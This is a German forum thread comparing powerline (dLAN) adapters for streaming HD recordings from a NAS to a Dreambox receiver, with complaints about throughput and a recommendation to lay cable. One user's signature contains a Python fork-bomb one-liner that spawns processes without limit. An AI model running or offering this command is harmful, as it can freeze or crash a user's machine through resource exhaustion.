Welche DLan Adapter hab ihr zum HD streamen

• Welche DLan Adapter hab ihr zum HD streamen

Hi,

wollte mal fragen, wer von euch welche Dlan Adapter um HD Streaming benutzt?

Würde gerne einer weiteren Box Zugriff auf meine NAS verschaffen, da aber Kabel ziehen und Löcher bohren nicht in Frage kommt, müssen nu DLan Adapter her.

Einen induktiven Phasenkoppler hab ich auch schon, da bisherige Versuche mit DLan nicht so erfolgreich waren.

Grade diese blöden HD Kanäle mit den extrem hohen Bitraten X( machten immer Probleme.

MfG Gerry
    • Danke.

Ich teste grade die Fritz 500E allerdings ist der Durchsatz auch nicht der Brüller... X(
      Darf eigentlich Jeder seine Produkte 500Mbit nennen? Hatte auch schon 200 Mbit Devolo und 200Mbit TP-Link. Die haben nicht mal 100Mbit gebracht.

Also irgendwie ist das Beste noch ein Kabel für n Zehner ....

MfG Gerry
    • Original von gerry6n
      ....

MfG Gerry

Besser formuliert geht nicht :D :D :D
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Original von gerry6n
      Danke.

Ich teste grade die Fritz 500E allerdings ist der Durchsatz auch nicht der Brüller... X(
      Darf eigentlich Jeder seine Produkte 500Mbit nennen? Hatte auch schon 200 Mbit Devolo und 200Mbit TP-Link. Die haben nicht mal 100Mbit gebracht.

MfG Gerry

100 Mbit reicht doch aus oder nicht die dreamboxen schaffen auch nicht mehr als max 100 Mbit oder ??
      also wenn es noch bei 100 Mbit was geruckelt hat dann hast du falsche einstellungen in der anbindung :)
    • Klar schafft die Dream nicht mehr als 100Mbit, aber wenn die vermeintlich 500 Mbit Dlan ...Kisten nicht mal 100 Mbit bringen kann ich nicht viel mit anfangen.

Zwar sind die netztest Ergebnisse zumindest lesend i.O. aber die Wiedergabe von HD Aufnahmen kann man knicken selbst SKY HD aufnahmen ruckeln gelegentlich. Mit ner Wurfleitung läufts.

MfG Gerry
    • Hei,

ich hatte eine ganze Weile die develo dlan200 im Einsatz.
      720p Streamen klappte tadellos, daber bi 1080p in Verbindung mit DTS war dann Schluss :(
      Habe dann mal die devolo dlan500 ausprobiert, die waren aber mit der damaligen FW schlechter als die dlan200.
      Habe mir jetzt auch ein Kabel durch mehrere Räume gelegt, war zwar Aufwand, aber das Ergebnis spricht für sich.
      Ich kannjetzt sogar problemlos 3D-Filme über den NAS streamen 8)

Gruß
      cruiser

DM900UHD DVB-C/T2 Newnigma2 OE 2.5 Daily